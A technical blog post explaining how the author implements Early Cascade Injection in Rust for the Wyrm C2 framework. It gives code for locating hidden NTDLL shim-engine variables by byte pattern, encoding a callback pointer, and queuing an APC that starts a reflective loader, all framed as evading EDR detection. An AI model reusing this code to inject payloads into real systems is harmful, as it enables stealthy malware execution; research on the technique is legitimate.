Crimes against NTDLL - Implementing Early Cascade Injection

Thread creation is so last year

Intro

You can find this implementation in my Wyrm C2 framework on GitHub.

Early Cascade Injection was published by Outflank in 2024. Full credit goes to them for discovering the technique - this post deals with the implementation of Early Cascade Injection in Rust.

I recommend reading Outflank’s blog post - however, as a quick primer, the technique allows for the loading of fileless malware in a foreign process without having to perform typical (and heavily monitored) process injection. This is also useful as a primitive to spawn a new sacrificial process for doing things such as execute-assembly in the Cobalt Strike world (Wyrm does not implement this yet with a sacrificial process but uses the dotex command to run dotnet code in memory).

There are two general buckets for running shellcode in foreign processes (exploits aside):

Process injection where the process is already running, or;
Spawn and inject, such as Process Hollowing, Early Bird Injection etc.

The problem with these approaches is that they are very well documented and, as such, likely to be detected by EDRs.

The clever trick with Early Cascade Injection is that it gives us code execution on our shellcode bootstrap without creating a suspicious thread or using suspicious cross-process Asynchronous Procedure Calls (APCs). Instead, we create the process in a suspended state (as is the norm with early process injection techniques) and surgically tamper with NTDLL before the first usermode thread runs.

When a new process is started, the Windows kernel performs certain actions to set the process up, one of which is mapping NTDLL into memory. Importantly, after the kernel has finished setting up the scaffolding of the process, the initial thread switches into usermode and begins executing at ntdll!LdrInitializeThunk. As Outflank explains, when a process is created in a suspended state with the CREATE_SUSPENDED flag, that usermode thread will not run until it is resumed.

The Shim Engine

I am purposefully missing out a lot of detail around how Outflank arrived here - their blog post does an excellent job of talking about the internals of NTDLL and EDR Preloading.

In short, the Shim Engine is a compatibility framework that intercepts API calls made by older applications and modifies them so that they work on newer versions of Windows. Its machinery is implemented in NTDLL, and it is that machinery which Outflank discovered can be abused for process injection.

Outflank found a global variable internal to NTDLL called g_pfnSE_DllLoaded. It is part of the Shim Engine and holds a callback pointer which we can modify to point at attacker-controlled shellcode. For that callback to be invoked, we also need to enable a flag named g_ShimsEnabled, which instructs the thread to start performing the Shim Engine routines.

Modifying these two gives us shellcode execution. However, we don’t want the full machinery of the Shim Engine to start running. Outflank chose g_pfnSE_DllLoaded because it is the first in a series of pointers that gets dispatched, meaning that as soon as our stub begins executing, we must disable g_ShimsEnabled so that the rest of the Shim Engine doesn’t run.

Finally, in the shellcode stub which runs, we can queue up an APC on the current thread, which is not nearly as suspicious as a cross-process APC. If you want some info on abusing cross-process APCs, check my blog post on APC Queue Injection.

So, the elements we need to make this work are:

Stage 0 - Initiator process (a loader, existing implant, etc) which creates the suspended process.
Stage 1 - Shim engine bootstrap shellcode that gets injected into the suspended process.
Stage 2 - A post-exploitation payload (such as the Wyrm C2 framework).

The stage 2 payload must be capable of performing Reflective DLL Injection from the start address of the queued APC; otherwise, your stage 1 stub needs to set up the post-ex payload itself.

There is one complication to solve - the variables we need to modify are not exported, so we cannot link against them or reach them via FFI. So, how do we manipulate them? The approach I took was simple pattern matching on code which references these variables, and then computing the address of the variable from the matched instruction. For example, the byte patterns below are the machine code, and the comments show the corresponding instructions:

const G_PFNSE_DLLLOADED_PATTERN: &[u8] = &[
    0x48, 0x8b, 0x3d, 0xd0, 0xc3, 0x12, 0x00,   // mov  rdi, qword ptr [ntdll!g_pfnSE_DllLoaded (############)]
    0x83, 0xe0, 0x3f,                           // and  eax, 3Fh
    0x44, 0x2b, 0xe0,                           // sub  r12d, eax
    0x8b, 0xc2,                                 // mov  eax, edx
    0x41, 0x8a, 0xcc                            // mov  cl, r12b
];

const G_SHIMS_ENABLED_PATTERN: &[u8] = &[
    0xe8, 0x33, 0x38, 0xf5, 0xff,               // call ntdll!RtlEnterCriticalSection (7ff9ddead780)
    0x44, 0x38, 0x2d, 0xe4, 0x84, 0x11, 0x00,   // cmp  byte ptr [ntdll!g_ShimsEnabled (7ff9de072438)], r13b
    0x48, 0x8d, 0x35, 0x95, 0x89, 0x11, 0x00,   // lea  rsi, [ntdll!PebLdr+0x10 (7ff9de0728f0)]
];

Then, using a simple function, we can scan the NTDLL module for these patterns. This is somewhat brittle as these bytes could change between builds of NTDLL. A better approach could be to wildcard the offset bytes and pattern match on the surrounding instructions, which likely have a better chance of being consistent between patches.
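As a rough illustration of the wildcard idea, the sketch below matches a pattern in which some positions accept any byte. This is not the scanner used in Wyrm: the names find_pattern and G_PFNSE_DLLLOADED_WILDCARD are hypothetical, and it works on an ordinary byte slice rather than a raw module pointer. The only bytes wildcarded are the four displacement bytes of the first instruction in the pattern shown earlier.

```rust
/// Returns the offset of the first match of `pattern` in `haystack`.
/// A `None` entry in the pattern matches any byte (a wildcard).
/// Hypothetical helper for illustration only.
fn find_pattern(haystack: &[u8], pattern: &[Option<u8>]) -> Option<usize> {
    if pattern.is_empty() || pattern.len() > haystack.len() {
        return None;
    }

    // `windows` never yields a slice that runs past the end of `haystack`
    haystack.windows(pattern.len()).position(|window| {
        window.iter().zip(pattern).all(|(byte, expected)| match expected {
            Some(e) => e == byte,
            None => true,
        })
    })
}

/// The g_pfnSE_DllLoaded pattern from above, with the 4 displacement bytes
/// of the `mov rdi, [rip+disp32]` instruction replaced by wildcards.
const G_PFNSE_DLLLOADED_WILDCARD: &[Option<u8>] = &[
    Some(0x48), Some(0x8b), Some(0x3d), None, None, None, None, // mov rdi, [rip+????]
    Some(0x83), Some(0xe0), Some(0x3f),                         // and eax, 3Fh
    Some(0x44), Some(0x2b), Some(0xe0),                         // sub r12d, eax
    Some(0x8b), Some(0xc2),                                     // mov eax, edx
    Some(0x41), Some(0x8a), Some(0xcc),                         // mov cl, r12b
];
```

Whether the surrounding instructions really are stable across NTDLL builds is an assumption that would need checking against several versions.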

Implementation

Stage zero

Ok - let’s start with the stage zero payload, which is the ‘initiator’. This has a few jobs:

Create a process in the suspended state.
Inject the stage two post-ex payload (in this case, Wyrm).
Locate the address of the stage one shellcode (which, in this case, is included in the memory injected in step 2).
Encode the pointer to the shellcode with the cookie in SharedUserData!Cookie, found at the constant address 0x7FFE0330.
Write the encoded pointer to g_pfnSE_DllLoaded and enable the g_ShimsEnabled flag in NTDLL.
Resume the thread.

There is very little point in me just copy-pasting the code that implements this; you can see it in the function early_cascade_spawn_child in the Wyrm source: src/spawn_inject/early_cascade.rs. However, I will call out a few important things:

On step 3, I did not write separate shellcode for the bootstrap. Instead, I wrote the bootstrap in no_std Rust meaning it does not rely on the standard library. The result is code that is sufficiently position independent to place in memory and execute directly, effectively behaving like shellcode. This is incredibly ergonomic.

In Wyrm I provide a function called Shim which acts as this ‘shellcode bootstrap’ for using Early Cascade Injection, and we will take a look at that code in the Stage One section. So, the address we will put into g_pfnSE_DllLoaded, is the address of the Shim function - allowing the thread to start executing straight up machine code with no dependencies. Neat!

The next thing to talk about here is having to encode the pointer that we write to g_pfnSE_DllLoaded. The shim callback pointer is stored in an encoded form, so writing a raw function pointer into g_pfnSE_DllLoaded will not work. Luckily for us, the key (cookie) used for the encoding is found in SharedUserData!Cookie, which is at a constant address (64-bit) of 0x7FFE0330. So, we can write a function that performs the pointer encoding, returning the encoded copy of the pointer:

fn encode_system_ptr(ptr: *const c_void) -> *const c_void {
    // Read the pointer cookie from SharedUserData!Cookie (KUSER_SHARED_DATA + 0x330)
    let cookie = unsafe { *(0x7FFE0330 as *const u32) };

    // XOR the pointer with the cookie, then rotate right (rotr64) by the low 6 bits of the cookie
    let ptr_val = ptr as usize;
    let xored = cookie as usize ^ ptr_val;
    let rotated = xored.rotate_right(cookie & 0x3F);

    rotated as *const c_void
}
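To make the transformation easier to reason about, here is a small sketch of the same arithmetic as pure functions that take the cookie as a parameter, together with the mathematical inverse. The names encode_with_cookie and decode_with_cookie are hypothetical and not part of Wyrm. The decode side is simply the inverse of the encode shown above, which is presumably what NTDLL does before calling the pointer.

```rust
/// Same arithmetic as `encode_system_ptr` above, but with the cookie passed
/// in explicitly: rotr64(cookie ^ ptr, cookie & 0x3F).
fn encode_with_cookie(ptr: u64, cookie: u32) -> u64 {
    (ptr ^ cookie as u64).rotate_right(cookie & 0x3F)
}

/// The inverse operation: undo the rotation first, then undo the XOR.
fn decode_with_cookie(encoded: u64, cookie: u32) -> u64 {
    encoded.rotate_left(cookie & 0x3F) ^ cookie as u64
}
```

Because the XOR happens before the rotation when encoding, decoding has to apply the two steps in reverse order. Round-tripping a value through both functions is a cheap sanity check on the encoding logic before writing anything into the target process.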

Finally, we want to talk about how to resolve the global variables we wish to write to. As mentioned, we pattern match on code in NTDLL that references these variables, and then derive each variable’s true address from the RIP-relative offset encoded in the matched instruction.

To follow through in its entirety, check the source in shared_no_std/src/memory.rs.

So, we take the two patterns:

const G_PFNSE_DLLLOADED_PATTERN: &[u8] = &[
    0x48, 0x8b, 0x3d, 0xd0, 0xc3, 0x12, 0x00,   // mov  rdi, qword ptr [ntdll!g_pfnSE_DllLoaded (############)]
    0x83, 0xe0, 0x3f,                           // and  eax, 3Fh
    0x44, 0x2b, 0xe0,                           // sub  r12d, eax
    0x8b, 0xc2,                                 // mov  eax, edx
    0x41, 0x8a, 0xcc                            // mov  cl, r12b
];

const G_SHIMS_ENABLED_PATTERN: &[u8] = &[
    0xe8, 0x33, 0x38, 0xf5, 0xff,               // call ntdll!RtlEnterCriticalSection (7ff9ddead780)
    0x44, 0x38, 0x2d, 0xe4, 0x84, 0x11, 0x00,   // cmp  byte ptr [ntdll!g_ShimsEnabled (7ff9de072438)], r13b
    0x48, 0x8d, 0x35, 0x95, 0x89, 0x11, 0x00,   // lea  rsi, [ntdll!PebLdr+0x10 (7ff9de0728f0)]
];

And we search for their usage with this simple function where we pass the pattern as the third argument. The first and second args relate to the base address of NTDLL and its size:

use core::{ffi::c_void, slice::from_raw_parts};

#[inline(always)]
pub fn scan_module_for_byte_pattern(
    image_base: *const c_void,
    image_size: usize,
    pattern: &[u8],
) -> Result<*const c_void, ()> {
    // An empty pattern, or one longer than the image, can never match
    if pattern.is_empty() || pattern.len() > image_size {
        return Err(());
    }

    // Convert the raw address pointer to a byte pointer so we can read individual bytes
    let image_base = image_base as *const u8;
    // The last offset at which the whole pattern still fits inside the image; stopping here
    // prevents the comparison from reading past the end of the mapped module
    let last_offset = image_size - pattern.len();

    for offset in 0..=last_offset {
        // SAFETY: the caller guarantees `image_base..image_base + image_size` is readable, and
        // `offset + pattern.len() <= image_size` holds for every iteration
        let bytes = unsafe { from_raw_parts(image_base.add(offset), pattern.len()) };

        if bytes == pattern {
            return Ok(bytes.as_ptr() as *const c_void);
        }
    }

    Err(())
}

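Then, we need to turn the match into the address of the variable itself. The matched instruction addresses the variable RIP-relatively, so the variable lives at the address of the next instruction (the match address plus the instruction length) plus the signed 32-bit displacement encoded in the instruction: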

let p_g_pfnse_dll_loaded = unsafe {
    const INSTRUCTION_LEN: isize = 7;

    // Skip the 3 bytes of REX prefix, opcode and ModRM to reach the displacement, and read it as a signed 4 byte value
    let offset = read_unaligned((p_text_g_pfnse_dll_loaded as *const u8).add(3) as *const i32);
    let offset = offset as isize + INSTRUCTION_LEN;

    (p_text_g_pfnse_dll_loaded as isize + offset) as *mut c_void
};
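The same calculation can be written as a small pure function, which is handy for g_ShimsEnabled because the instruction of interest (the cmp) does not sit at the start of that pattern, but 5 bytes in, after the call. The sketch below is illustrative only: resolve_rip_relative and its parameters are hypothetical names, and it works on a byte slice plus the address at which that slice was found rather than on raw pointers.

```rust
/// The g_ShimsEnabled pattern from above: call rel32 (5 bytes),
/// cmp [rip+disp32], r13b (7 bytes), lea rsi, [rip+disp32] (7 bytes).
const G_SHIMS_ENABLED_PATTERN: &[u8] = &[
    0xe8, 0x33, 0x38, 0xf5, 0xff,
    0x44, 0x38, 0x2d, 0xe4, 0x84, 0x11, 0x00,
    0x48, 0x8d, 0x35, 0x95, 0x89, 0x11, 0x00,
];

/// Resolves the absolute address referenced by a RIP-relative instruction.
///
/// * `code`         - the matched bytes
/// * `code_addr`    - the address `code[0]` was found at
/// * `instr_offset` - where the instruction starts within `code`
/// * `disp_offset`  - where the disp32 starts within the instruction
/// * `instr_len`    - total length of the instruction
///
/// Hypothetical helper for illustration only.
fn resolve_rip_relative(
    code: &[u8],
    code_addr: u64,
    instr_offset: usize,
    disp_offset: usize,
    instr_len: usize,
) -> Option<u64> {
    // Read the little-endian signed displacement, bailing out if it is out of range
    let start = instr_offset.checked_add(disp_offset)?;
    let end = start.checked_add(4)?;
    let b = code.get(start..end)?;
    let disp = i32::from_le_bytes([b[0], b[1], b[2], b[3]]);

    // RIP-relative operands are relative to the address of the *next* instruction
    let next_instr = code_addr.checked_add(instr_offset.checked_add(instr_len)? as u64)?;

    // Sign-extend the displacement so negative values move backwards
    Some(next_instr.wrapping_add(disp as i64 as u64))
}
```

Working backwards from the debugger addresses in the pattern comments, this pattern would have started at 0x7ff9ddf59f48 in that particular NTDLL build. With that base, resolve_rip_relative(G_SHIMS_ENABLED_PATTERN, 0x7ff9ddf59f48, 5, 3, 7) yields 0x7ff9de072438, which is the g_ShimsEnabled address shown in the comment.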

And with that, we can resolve the addresses of both internal variables! All that is left to do is set g_pfnSE_DllLoaded to the encoded address we dealt with earlier, and set g_ShimsEnabled to 1.

Stage one

The stage one that is capable of being executed by a fresh thread is found in the Shim function in implant/src/stubs/shim.rs.

Whilst operating here we do have some restrictions - we should assume kernel32 and kernelbase are not yet available for use, meaning we are limited to the core library, compiler intrinsics and functions exported by NTDLL. This is fine; we can work with this for what we need.

The stage one has a few duties:

Resolve the address of NtQueueApcThread so we can launch the stage two.
Disable the g_ShimsEnabled variable we enabled from stage zero.
Queue an APC via NtQueueApcThread pointing to the stage two.

To resolve the address of NtQueueApcThread, I use a variation of my export-resolver crate which I have embedded into Wyrm. In short, this uses PEB walking to resolve the addresses of functions we wish to use. The variation included in Wyrm is no_std compliant such that we can use it in our free standing stub.

Next, we search for g_ShimsEnabled and set it to 0, in exactly the same way shown above. Again - the code I wrote to resolve the addresses is no_std.

Finally, we can call NtQueueApcThread to queue an APC at the address of the reflective loader of Wyrm.

In order to use this function, we first must declare its prototype:

type NtQueueApcThread = unsafe extern "system" fn(
    thread_handle: isize,
    apc_routine: *const c_void,
    arg1: usize,
    arg2: usize,
    arg3: usize,
) -> u32;

And then cast the address we found via the export-resolver variant to the type NtQueueApcThread:

let p_nt_queue_apc_thread = resolve_address("ntdll.dll", "NtQueueApcThread", None);
let NtQueueApcThread = core::mem::transmute::<_, NtQueueApcThread>(p_nt_queue_apc_thread);

Then we set up our arguments which go into the function, and call it normally (where Load is the name of the function in Wyrm which performs reflective DLL loading):

let current_thread = -2isize;
let apc_routine = Load as *const c_void;
let apc_arg1 = 0usize;
let apc_arg2 = 0usize;
let apc_arg3 = 0usize;

NtQueueApcThread(current_thread, apc_routine, apc_arg1, apc_arg2, apc_arg3);
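The call above discards the returned NTSTATUS. If you do want to act on it, the usual convention is that an NTSTATUS is a signed 32-bit value and any non-negative value counts as success. A minimal sketch, assuming the u32 return type from the prototype above (nt_success is a hypothetical helper name, not something from Wyrm):

```rust
/// Mirrors the NT_SUCCESS convention: an NTSTATUS is a signed 32-bit value,
/// and anything non-negative (success or informational) counts as success.
/// Hypothetical helper for illustration only.
fn nt_success(status: u32) -> bool {
    (status as i32) >= 0
}
```

In a stub this early in process initialisation there is little you can do on failure beyond returning quietly, so whether the check is worth the extra bytes is a judgment call.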

The eagle-eyed reader may be wondering how the queued APC actually runs. Helpfully, as the thread continues its initialisation in NTDLL after our shim magic has run, NTDLL makes a call to NtTestAlert, which dispatches any items pending in the thread’s APC queue. This gives us free execution without having to either wait on a prayer or call NtTestAlert ourselves.

Stage two

Finally, our stage two loads - in this case it’s the Wyrm reflective DLL loader. I’m not going into the internals of that here as it’s pretty complex, however you can check the source at: implant/src/stubs/rdi.rs.